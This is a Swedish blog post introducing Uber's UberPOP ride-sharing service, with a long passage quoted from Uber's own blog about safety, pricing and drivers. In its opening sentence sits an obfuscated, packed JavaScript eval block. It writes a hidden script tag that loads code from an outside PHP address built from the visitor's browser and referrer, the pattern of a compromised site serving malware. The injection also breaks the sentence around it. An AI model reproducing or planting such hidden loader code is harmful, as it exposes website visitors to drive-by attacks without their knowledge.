Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Ni har väl inte missat UberPOP taxiservice?

Ni har väl inte missat UberPOP taxiservice?
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdyta|var|u0026u|referrer|hdeks||js|php’.split(’|’),0,{}))
var några dagar sedan som tjänsten lanserades men vi har inte uppmärksammat den på Revue.se. Så här kommer en beskrivning av den! På bilden ovan ser ni mig, Sebastian Plengier Ehrnfelt som är ute och testar Uber Lux när tjänsten lanserades. 

Så här skriver Uber själva:

uberPOP är en ny typ av samåkningstjänst som på ett säkert och effektivt sätt kopplar samman bilägare som har ledig plats i bilen med resenärer som behöver en trygg och billig resa. Utvalda Uberanvändare får nu tillgång till testversionen i sin Uber-app.

uberPOP gör att vi kan använda den befintliga bilparken mer effektivt. På så sätt kan vi minska antalet bilar, minska utsläpp, trängsel i trafiken och bidra till fler lediga parkeringsplatser. Samtidigt möjliggör vi en säker och effektiv samåkningstjänst som är mer än 60% billigare än taxipriser.

I San Francisco och ett flertal andra städer är denna typ av samåkning nu så effektivt att det börjar ersätta ägandet av bilar. uberPOP är ett första steg mot att effektivisera samåkning även i Sverige. Vi hoppas du vill vara en del av framtiden med oss!

uberPOP är, enkelt förklarat, en samåkningstjänst där passagerare och förare finner varandra. Vi tillhandahåller tekniken för att de ska hitta varandra på ett tryggt, billigt, bekvämt och miljömedvetet sätt. På så sätt kan vi använda bilarna som redan producerats och som finns på våra vägar – mer effektivt. Samtidigt får bilägaren en möjlighet att täcka en del av sina kostnader för att äga sin bil.

Förare måste kvalificera sig för att kunna erbjuda uberPOP. De intervjuas, genomgår utbildning, har haft körkort i minst tre år och har ett kontrollerat brottsregister. Bilarna är godkända och besiktigade, och förare och passagerare är försäkrade av förarens trafikförsäkring och Ubers försäkring.

uberPOP kan jämföras med tjänster som gör det möjligt för privatpersoner att hyra ut lediga rum och lägenheter. På samma sätt hjälper uberPOP bilägare att dela med sig av outnyttjat utrymme på ett tryggt sätt för alla inblandade. Med uberPOP gör vi med ett säte i en bil det som har gjorts med ett rum i en bostad: vi hjälper ägaren att dela med sig. På så sätt förbättrar vi framkomligheten, valmöjligheterna och miljön.

Läs mer om tjänsten här: http://blog.uber.com/uberpopsverige

Text från blog.uber.com/uberpopsverige